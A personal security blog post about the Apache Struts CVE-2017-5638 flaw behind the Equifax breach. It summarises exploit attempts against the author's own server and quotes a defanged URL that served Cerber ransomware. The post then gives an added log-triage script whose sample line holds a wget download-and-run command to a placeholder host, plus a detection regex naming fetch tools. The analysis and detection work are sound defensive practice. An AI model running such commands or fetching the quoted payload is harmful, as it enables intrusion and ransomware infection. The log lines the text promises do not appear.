Personal blog. Hobbies: IT, security, privacy, democracy.

Equifax was compromised through Apache Struts (CVE-2017-5638); here are example attack attempts from my own logs

On 15 September 2017, Equifax stated that their compromise happened through exploitation of a vulnerability in Apache Struts, CVE-2017-5638 (published in March 2017, when it was already being exploited in the wild), which involves a crafted Content-Type HTTP request header. For those interested, here are the log lines of 28 (untargeted) requests that attempted to exploit this vulnerability against my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to the right in the grey box below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and to /bin/bash on non-Windows systems. 12 of the 28 cases attempt to download and run code; the remaining 16 cases only execute echo “Struts2045” or echo “Amen4Wolves” and appear to be probes for the vulnerability. In (only) one case the payload could still be retrieved: hxxp://82.165.129.119/UnInstall.exe, which contains Cerber ransomware. So this was an attempt to distribute ransomware by exploiting CVE-2017-5638; the source was 220.191.231.222, registered to ‘Jinhua Electronic Government Network’.
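As an added example (not the author's code or logs), the script below applies the same triage to access-log lines: it picks out requests whose Content-Type header carries an OGNL “#cmd=” marker, extracts the command, and splits the hits into echo-only probes and download-and-run attempts. It assumes an Apache LogFormat that records the Content-Type request header (`%{Content-Type}i`); the sample lines are constructed and keep only the markers described above, not a complete expression.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample lines (not the author's logs). Assumed Apache LogFormat:
#   %h %t "%r" %>s "%{Content-Type}i"
# The Content-Type field keeps only the #cmd= / #cmds= markers the post
# describes; the rest of the OGNL expression is left out on purpose.
SAMPLE_LOG = """\
203.0.113.5 [10/Mar/2017:01:02:03 +0100] "GET / HTTP/1.1" 200 "%{(#cmd='echo Struts2045').(#cmds=(...))}"
203.0.113.9 [11/Mar/2017:04:05:06 +0100] "POST / HTTP/1.1" 200 "%{(#cmd='wget -O /tmp/a hxxp://198.51.100.7/x.sh; sh /tmp/a').(#cmds=(...))}"
198.51.100.2 [12/Mar/2017:07:08:09 +0100] "GET /index.html HTTP/1.1" 200 "text/html"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) "(?P<ctype>.*)"$')
CMD_RE = re.compile(r"#cmd='(?P<cmd>[^']*)'")
DOWNLOAD_RE = re.compile(r"\b(wget|curl|certutil|bitsadmin|powershell)\b", re.I)
URL_RE = re.compile(r"hxxps?://[^\s;'\"]+|https?://[^\s;'\"]+")


@dataclass
class Finding:
    ip: str
    timestamp: str
    cmd: str
    kind: str            # "probe", "download" or "other"
    url: Optional[str]   # payload location for download attempts


def classify(cmd: str) -> str:
    """Echo-only payloads are vulnerability probes; a fetch tool means download-and-run."""
    if DOWNLOAD_RE.search(cmd):
        return "download"
    return "probe" if cmd.lstrip().startswith("echo") else "other"


def analyze_log(text: str) -> List[Finding]:
    """Return one Finding per request whose Content-Type carries an OGNL #cmd= marker."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ctype = m.group("ctype")
        if "%{" not in ctype or "#cmd=" not in ctype:
            continue                      # ordinary request with a legitimate media type
        c = CMD_RE.search(ctype)
        cmd = c.group("cmd") if c else ctype
        u = URL_RE.search(cmd)
        findings.append(Finding(m.group("ip"), m.group("ts"), cmd, classify(cmd), u.group(0) if u else None))
    return findings
```

Run `analyze_log(SAMPLE_LOG)` to get the two hits; the third line is an ordinary request and is skipped.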

Employed as technical security consultant at Secura B.V. (formerly known as Madison Gurkha). Guest researcher at University of Amsterdam. MSc in OS3 System & Network Engineering (2005-2006) and PhD in data anonymity (2007-2011) from University of Amsterdam.

Many posts on this blog are scraps of information, published for posterity and reference. Posts prior to Q2/2012 were submitted while I was employed at the University of Amsterdam.